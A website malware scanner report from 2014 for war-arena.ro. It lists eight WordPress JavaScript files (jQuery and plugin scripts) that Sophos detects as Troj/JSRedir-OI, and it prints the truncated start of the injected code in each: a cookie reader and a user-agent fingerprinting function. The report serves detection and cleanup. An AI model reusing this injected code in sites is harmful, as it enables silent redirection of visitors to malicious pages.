New scan:

Malware Scanner report for war-arena.ro

Malicious/Suspicious/Total urls checked
8/0/20
8 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "war-arena.ro" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=war-arena.ro

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://war-arena.ro/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://war-arena.ro/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 11 Sep 2014 02:52:34 GMT
Location: http://www.war-arena.ro/
Server: nginx admin
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: HIT from Backend
X-Pingback: http://www.war-arena.ro/xmlrpc.php
clean
http://www.war-arena.ro/
200 OK
Content-Length: 88286
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js
200 OK
Content-Length: 93435
Content-Type: text/javascript
clean
http://ajax.googleapis.com/ajax/libs/jqueryui/1.9.1/jquery-ui.min.js
200 OK
Content-Length: 237108
Content-Type: text/javascript
clean
http://www.war-arena.ro/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 98402
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 3194 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});
jQuery.noConflict();

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 9199
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 3300 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-content/plugins/custom-background/js/preload.js?ver=1.0.0
200 OK
Content-Length: 4039
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 2170 bytes are skipped ...
uedStop = false;

function startPreloading() {
if(isPreloading)
return;

$(document.createElement('img')).bind('load', function() {
if(queuedStop) {
queuedStop = isPreloading = false;
return;
}
isPreloading = true;
if($.preloadImages.imageQueue.length > 0) {
this.src = $.preloadImages.imageQueue.shift();
} else
isPreloading = false;
}).trigger('load');
}


})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-content/plugins/custom-background/js/bgstretcher.js?ver=1.0.0
200 OK
Content-Length: 23188
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 3537 bytes are skipped ...
3000,
slideShowSpeed: 'normal',
slideShow: true,
transitionEffect: 'fade', slideDirection: 'N', sequenceMode: 'normal', buttonPrev: '',
buttonNext: '',
pagination: '',
anchoring: 'left top', anchoringImg: 'left top', preloadImg: true,
stratElementIndex: 0,
callbackfunction: null,
selector: 'body'
};
$.fn.bgStretcher.settings = {};
})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-content/plugins/custom-background/js/cookie.js?ver=1.0.0
200 OK
Content-Length: 6800
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 2365 bytes are skipped ...
break;
}
}
}
return cookieValue;
}
};

function getCookie(name){
var cookies = document.cookie;
if (cookies.indexOf(name) != -1){
var startpos = cookies.indexOf(name)+name.length+1;
var endpos = cookies.indexOf(";",startpos)-1;
if (endpos == -2) endpos = cookies.length;
return unescape(cookies.substring(startpos,endpos));
}else{
return 0;
}
}

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-content/plugins/custom-background/js/jquery.jparallax.js?ver=0.9.1
200 OK
Content-Length: 15030
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 3402 bytes are skipped ...
triggerResponse: true, triggerExposesEdges: false, xparallax: true, yparallax: true, xorigin: 0.5, yorigin: 0.5, xtravel: 1, ytravel: 1,
takeoverFactor: 0.65, takeoverThresh: 0.002, frameDuration: 25 };
initOrigin($.fn.jparallax.settings);
$(function() {

});
})(jQuery);
}
init_parallax_plugin();

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-content/plugins/custom-background/js/custom_background.js?ver=1.0.1
200 OK
Content-Length: 9714
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 3583 bytes are skipped ...
bg_backgrounds[bg_set][k].background_selector = '#'+id;
}
});
}
});
});
}
}

function is_cb_admin(){
try{
if(top.location.href!= window.location.href){
if(null!=window.parent.document.getElementById("bg_frame")){
jQuery(document).ready(function($) {
$('style[rel=custom-backgrounds]').remove();
});
return true;
}
}
}catch(e){}
return false;
}

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.war-arena.ro/wp-content/plugins/taqyeem/js/tie.js?ver=3.9.2
200 OK
Content-Length: 4276
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined;

}
function Hardtechnology() {
var JameNoober = navigator.userAgent;
var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -
... 2768 bytes are skipped ...
}, 'html');
return false;
});

jQuery(document).on('mouseout', '.user-rate-active' , function () {
var rated = jQuery(this);
if( rated.hasClass('rated-done') ){
return false;
}
var post_rate = rated.attr('data-rate');
rated.find(".user-rate-image span").css('width', post_rate + '%');
});
});


function progress(percent, $element) {
$element.find('span').animate({ width: percent+'%' }, 700);
}

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://war-arena.ro//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 11 Sep 2014 02:52:41 GMT
Pragma: no-cache
Location: http://www.war-arena.ro/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
Server: nginx admin
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Cache: HIT from Backend
X-Pingback: http://www.war-arena.ro/xmlrpc.php
clean
http://www.war-arena.ro/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
404 Not Found
Content-Length: 79223
Content-Type: text/html
clean
http://www.war-arena.ro//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 11 Sep 2014 02:52:43 GMT
Pragma: no-cache
Location: http://www.war-arena.ro/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
Server: nginx admin
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Cache: HIT from Backend
X-Pingback: http://www.war-arena.ro/xmlrpc.php
clean
http://www.war-arena.ro/test404page.js
404 Not Found
Content-Length: 78421
Content-Type: text/html
clean
http://www.war-arena.ro//www.war-arena.ro/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 11 Sep 2014 02:52:46 GMT
Pragma: no-cache
Location: http://www.war-arena.ro/www.war-arena.ro/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/
Server: nginx admin
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.war-arena.ro/xmlrpc.php
clean
http://www.war-arena.ro/www.war-arena.ro/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/
404 Not Found
Content-Length: 79223
Content-Type: text/html
clean
http://www.war-arena.ro//www.war-arena.ro/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 11 Sep 2014 02:52:48 GMT
Pragma: no-cache
Location: http://www.war-arena.ro/www.war-arena.ro/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/
Server: nginx admin
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.war-arena.ro/xmlrpc.php
clean
http://www.war-arena.ro/www.war-arena.ro/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockui.min.js?ver=2.60/
404 Not Found
Content-Length: 79223
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: war-arena.ro

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 11 Sep 2014 02:52:34 GMT
Location: http://www.war-arena.ro/
Server: nginx admin
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: HIT from Backend
X-Pingback: http://www.war-arena.ro/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: war-arena.ro
Referer: http://www.google.com/search?q=war-arena.ro

Result:
The result is similar to the first query. There are no suspicious redirects found.